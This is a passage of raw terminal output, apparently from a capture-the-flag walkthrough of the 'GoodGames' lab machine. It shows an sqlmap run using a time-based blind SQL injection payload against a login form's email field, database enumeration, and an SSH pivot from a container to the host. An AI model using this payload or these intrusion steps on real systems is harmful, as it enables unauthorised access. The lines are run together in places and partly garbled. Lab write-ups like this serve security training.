[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:54:33 /2025-09-04/
[16:54:33] [INFO] parsing HTTP request from 'request' [16:54:33] [WARNING] provided value for parameter 'email' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [16:54:33] [WARNING] provided value for parameter 'password' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [16:54:33] [INFO] resuming back-end DBMS 'mysql' [16:54:33] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=' AND (SELECT 4855 FROM (SELECT(SLEEP(5)))LHIO) AND 'FmPO'='FmPO&password= --- [16:54:34] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [16:54:34] [INFO] fetching database names [16:54:34] [INFO] fetching number of databases [16:54:34] [INFO] resumed: 2 [16:54:34] [INFO] resumed: information_schema [16:54:34] [INFO] resumed: main available databases [2]: [*] information_schema [*] main
oot@3a453ab39d3d:/backend# ssh augustus@172.19.0.1 The authenticity of host '172.19.0.1 (172.19.0.1)' can't be established. ECDSA key fingerprint is SHA256:AvB4qtTxSVcB0PuHwoPV42/LAJ9TlyPVbd7G6Igzmj0. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '172.19.0.1' (ECDSA) to the list of known hosts. augustus@172.19.0.1's password: Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. augustus@GoodGames:~$ ls user.txt
//切换至宿主机 augustus@GoodGames:~$ ls -al total 1232 drwxr-xr-x 2 augustus augustus 4096 Sep 6 03:22 . drwxr-xr-x 3 root root 4096 Oct 19 2021 .. -rwxr-xr-x 1 augustus augustus 1234376 Sep 6 03:22 bash lrwxrwxrwx 1 root root 9 Nov 3 2021 .bash_history -> /dev/null -rw-r--r-- 1 augustus augustus 220 Oct 19 2021 .bash_logout -rw-r--r-- 1 augustus augustus 3526 Oct 19 2021 .bashrc -rw-r--r-- 1 augustus augustus 807 Oct 19 2021 .profile -rw-r--r-- 1 root root 0 Sep 6 03:10 test -rw-r----- 1 root augustus 33 Sep 5 16:02 user.txt